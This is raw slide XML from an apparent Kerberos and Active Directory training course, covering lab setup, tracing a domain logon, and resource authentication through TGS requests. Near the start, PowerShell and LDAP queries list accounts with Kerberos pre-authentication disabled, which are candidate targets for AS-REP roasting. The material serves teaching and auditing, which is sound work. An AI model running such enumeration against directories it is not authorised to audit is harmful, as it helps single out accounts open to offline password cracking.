                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADComputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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-Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserAccountControl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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-band</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$DONT_REQ_PREAUTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B06090405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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B06090405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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LDAPFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"(&amp;(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=person)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=computer))(userAccountControl:1.2.840.113556.1.4.803:=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$DONT_REQ_PREAUTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B06090405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46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Lab 1: Preparing the lab environment</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282654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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facilities and Logistics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="4154984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Class hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Building hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restrooms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Smoking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recycling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Course Material</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>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314143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Lab 2: Trace a domain logon</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3525997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dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resource Authentication in a single domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3305119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lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resource Authentication in single domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2339102"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Almost the same process like logging on to a machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A TGS for the resource server is requested from the KDC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The TGS is forwarded to the resource machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the source machine can decrypt the ticket an access token is built</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access check is the same like on a local machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="312553" y="3247668"/>
            <a:ext cx="2745305" cy="2451771"/>
            <a:chOff x="195776" y="2708920"/>
            <a:chExt cx="2745305" cy="2451771"/>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155" y="2855866"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="2939970"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3183336"/>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866" y="3457211"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3482148"/>
              <a:ext cx="1789823"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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>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776" y="2708920"/>
              <a:ext cx="566691" cy="526075"/>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6939" y="3898005"/>
              <a:ext cx="472016" cy="312696"/>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8493" y="4323782"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6030866" y="2706401"/>
            <a:ext cx="2954284" cy="2504842"/>
            <a:chOff x="5771714" y="2855866"/>
            <a:chExt cx="2954284" cy="2504842"/>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5677" y="3047692"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="3138190"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="3370016"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</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3374" y="3743383"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="3803666"/>
              <a:ext cx="1553121"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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71714" y="2855866"/>
              <a:ext cx="628030" cy="741586"/>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64123" y="4598833"/>
              <a:ext cx="761875" cy="761875"/>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78170" y="4252507"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Pictur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64480" y="4754182"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3203073" y="4753257"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 2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69693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 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25668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="Picture 2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22319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181865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de-DE" dirty="0"/>
              <a:t>3. TGS Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same process like asking for a TGS for the local machine (just different SPN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
